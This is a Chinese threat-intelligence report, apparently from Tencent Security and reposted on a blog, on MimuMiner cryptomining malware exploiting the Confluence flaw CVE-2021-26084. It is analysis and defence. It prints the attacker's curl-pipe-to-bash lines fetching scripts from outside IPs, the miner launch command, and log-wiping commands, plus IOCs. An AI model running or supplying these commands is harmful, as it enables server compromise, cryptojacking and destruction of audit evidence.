正文

腾讯云防火墙、云WAF成功防御MimuMiner挖矿木马利用Confluence RCE漏洞的攻击

admin
admin V管理员 /0 评论 /48 阅读
0928
此篇文章发布距今已超过56天,您需要注意文章的内容或图片是否可用!


长按二维码关注

腾讯安全威胁情报中心

一、概述

8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例,之后陆续发现至少7个已知网络黑产团伙在利用该漏洞发起的攻击行动。

上周至今,腾讯安全检测到新挖矿木马家族MimuMiner利用Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)进行攻击传播,该家族在入侵成功后会尝试通过SSH连接横向移动。从拦截数据看,攻击量呈明显上升趋势。已部署腾讯T-Sec主机安全专业版、T-Sec Web应用防火墙(WAF)的客户成功防御,保护数千台云主机免于失陷。

技术分析发现,此次利用Atlassian Confluence RCE漏洞攻击的MimuMiner挖矿木马运行时,会清除多个竞品挖矿木马独占系统资源,攻击后会清除系统日志,并通过被控系统已创建的SSH连接进行横向传播。

腾讯安全专家再次提醒所有采用Atlassian Confluence作知识管理和协同应用的政企客户,尽快升级到安全版本以修复漏洞。腾讯安全网络空间测绘数据显示,Atlassian Confluence应用广泛,中国占比为全球最高(21.46%)、其次是美国(21.36%)、德国(18.40%)。

二、详细分析

腾讯云防火墙、腾讯Web应用防火墙(WAF)成功捕获MimuMiner挖矿木马利用CVE-2021-26084漏洞的攻击:


通过漏洞执行远程命令:
curl hxxp://190.144.115.54:443/cn.sh | bashcurl hxxp://165.227.239.108/static.sh | bash

Shell脚本的功能

1.shell脚本首先清除4SHMiner、H2Miner、kwroksminer等挖矿家族的文件和进程。


2.然后下载挖矿木马到/var/tmp/mimu或/tmp/system目录下。


3.接着启动挖矿木马,矿池地址165.227.239.108:3333,均获取当前用户HOSTNAME作为用户名和密码。
/var/tmp/mimu -o 165.227.239.108:3333 -u $HOSTNAME -p $HOSTNAME -k -B --cpu-priority 5 -l /tmp/xlog --randomx-1gb-pages >/dev/null 2>&1    /tmp/system -o 165.227.239.108:3333 -u $HOSTNAME -p $HOSTNAME -k -B --cpu-priority 5 -l /tmp/.ssh/xlog --randomx-1gb-pages >/dev/null 2>&

4.攻击者还会对系统日志进行清除。
echo > /var/log/wtmpecho > /var/log/lastlogecho >   /var/log/utmpcat /dev/null >  /var/log/securecat /dev/null >  /var/log/messagesed  -i '/107.191.63.34/'d  /var/log/messagessed -i 's/107.191.63.34/127.0.0.1/g' secure

5.下载和执行木马保活脚本staticalive.sh。


6.通过SSH连接实现横向移动。

IOCs

MD5

f1a44ecb0ef3089da570f13ea9617518
f20a1eaa94d0e2715811eadd604e30d4


URL

hxxp://190.144.115.54:443/stl.sh
hxxp://190.144.115.54:443/cn.sh
hxxp://190.144.115.54/static.sh
hxxp://190.144.115.54/staticalive.sh
hxxp://165.227.239.108/ldr.sh
hxxp://165.227.239.108/static.c
hxxp://165.227.239.108/stlalive.sh
hxxp://165.227.239.108/static.sh

时间线:

1.2021年8月25日,Atlassian官方发布安全通告,披露了一个Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084),攻击者利用漏洞可以完全控制服务器;
2.2021年8月26日,腾讯安全发布风险通告;
3.2021年8月31日,腾讯安全捕获Atlassian Confluence 远程代码执行漏洞在野利用;
4.2021年9月1日,漏洞poc公开在Github;
5.2021年9月1日晚,腾讯安全检测到多个不同的挖矿木马团伙、僵尸网络团伙利用Atlassian Confluence 远程代码执行漏洞洞攻击云主机;
6.2021年9月2日,腾讯安全检测到利用该漏洞攻击的黑产团伙增加到7个,挖矿家族5个:kwroksminer,iduckminer,h2miner,8220Miner,z0miner;僵尸网络家族2个:mirai,BillGates,腾讯安全全栈安全产品成功保护数千台云主机免于失陷;
7.2021年9月14日,腾讯安全再发报告,披露MimuMinerd挖矿木马家族利用该漏洞在一周左右频繁攻击云主机,腾讯安全再次成功防御,保护数千台云主机未被攻克。

参考连接:


https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.htm

关于腾讯安全威胁情报中心

腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑,帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。

长按二维码关注

腾讯安全威胁情报中心


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
周飒博客-ZhouSa.com